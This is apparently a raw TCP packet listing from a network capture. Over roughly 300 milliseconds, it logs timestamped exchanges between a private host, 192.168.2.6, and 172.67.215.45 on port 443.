May 4, 2024 09:48:41.462397099 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.465643883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.465665102 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.465737104 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.465745926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.465785980 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.468352079 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.468379021 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.468420982 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.468430042 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.468457937 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.468481064 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.471247911 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.471265078 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.471333981 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.471343994 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.471378088 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.473658085 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.473680019 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.473741055 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.473752975 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.473790884 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.476891041 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.476908922 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.476970911 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.476979017 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.477019072 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.480081081 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.480097055 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.480154991 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.480164051 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.480202913 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.482346058 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.482363939 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.482425928 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.482434034 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.482472897 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.485265017 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.485281944 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.485335112 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.485342979 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.485380888 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.569394112 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.569412947 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.569493055 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.569509029 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.569552898 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.571985960 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.572007895 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.572072983 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.572079897 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.572127104 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.574693918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.574717045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.574775934 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.574786901 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.574832916 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.578527927 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.578546047 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.578620911 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.578628063 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.578692913 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.580713034 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.580733061 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.580773115 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.580780983 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.580809116 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.580830097 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.583446026 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.583463907 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.583523035 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.583530903 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.583575010 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.586150885 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.586168051 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.586224079 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.586231947 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.586275101 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.589715958 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.589734077 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.589792967 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.589801073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.589844942 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.592149973 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.592166901 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.592225075 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.592232943 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.592273951 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.594861031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.594877005 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.594930887 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.594938040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.594976902 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.598356962 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.598376036 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.598429918 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.598438025 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.598474026 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.601141930 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.601160049 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.601213932 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.601221085 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.601260900 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.603799105 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.603815079 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.603872061 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.603880882 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.603924990 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.606275082 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.606292963 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.606340885 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.606348991 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.606389046 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.609808922 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.609824896 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.609884977 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.609893084 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.609972954 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.612559080 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.612576008 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.612634897 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.612642050 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.612682104 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.615056038 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.615072012 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.615128040 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.615135908 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.615173101 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.618561029 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.618582010 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.618653059 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.618663073 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.618702888 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.621357918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.621375084 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.621542931 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.621552944 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.621598005 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.623951912 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.623967886 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.624032974 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.624042034 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.624080896 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.626458883 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.626480103 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.626524925 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.626533031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.626558065 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.626578093 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.629638910 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.629657030 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.629715919 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.629724979 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.629765034 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.632050991 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.632067919 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.632128954 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.632137060 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.632175922 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.634479046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.634495974 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.634546041 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.634557009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.634591103 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.636607885 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.636622906 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.636674881 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.636682987 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.636719942 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.639379025 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.639405012 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.639446020 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.639453888 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.639477015 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.639494896 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.641330004 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.641351938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.641396999 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.641403913 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.641427040 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.641443968 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.644346952 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.644364119 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.644418955 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.644428015 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.644465923 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.646810055 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.646836996 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.646888018 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.646895885 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.646929979 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.648624897 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.648641109 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.648689032 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.648696899 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.648734093 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.651237965 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.651252031 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.651304007 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.651310921 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.651333094 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.651351929 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.653028965 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.653049946 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.653093100 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.653100014 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.653134108 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.655231953 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.655257940 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.655307055 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.655318022 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.655355930 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.657675982 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.657692909 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.657741070 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.657748938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.657787085 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.660249949 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.660265923 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.660315037 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.660322905 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.660360098 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.662111044 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.662127018 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.662170887 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.662178040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.662194014 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.662215948 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.664828062 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.664843082 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.664891958 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.664899111 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.664937019 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.666698933 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.666718006 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.666755915 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.666763067 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.666784048 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.666804075 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.669306040 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.669325113 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.669370890 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.669378996 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.669420958 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.671099901 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.671114922 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.671160936 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.671169043 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.671190023 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.671207905 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.673815012 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.673830986 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.673873901 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.673880100 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.673907995 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.673926115 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.675683022 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.675707102 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.675740957 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.675746918 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.675782919 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.675801039 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.678308010 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.678324938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.678371906 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.678381920 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.678421021 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.680144072 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.680161953 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.680202007 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.680208921 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.680227995 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.680252075 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684077024 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684123993 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684153080 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684159994 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684180021 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684201956 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684699059 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684722900 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684762001 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684767962 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.684794903 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.684806108 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.687428951 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.687463045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.687567949 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.687577009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.687623024 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.689089060 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.689119101 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.689172983 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.689179897 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.689217091 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.692135096 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.692167044 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.692207098 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.692214966 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.692240000 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.692254066 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.693655014 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.693677902 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.693721056 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.693727970 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.693761110 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.696346045 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.696363926 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.696409941 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.696417093 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.696451902 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.698101997 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.698117018 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.698162079 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.698168039 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.698204041 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.700875998 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.700894117 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.700939894 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.700947046 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.700980902 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.702711105 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.702727079 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.702773094 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.702780008 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.702805996 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.702820063 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.705313921 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.705329895 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.705377102 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.705383062 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.705419064 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.728853941 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.728876114 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.728965044 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.728974104 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.729013920 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.731245995 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.731262922 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.731462002 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.731473923 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.731518030 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.733241081 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.733258009 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.733304024 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.733310938 CEST	443	49708	172.67.215.45	192.168.2.6
May 4, 2024 09:48:41.733334064 CEST	49708	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:41.733354092 CEST	49708	443	192.168.2.6	172.67.215.45
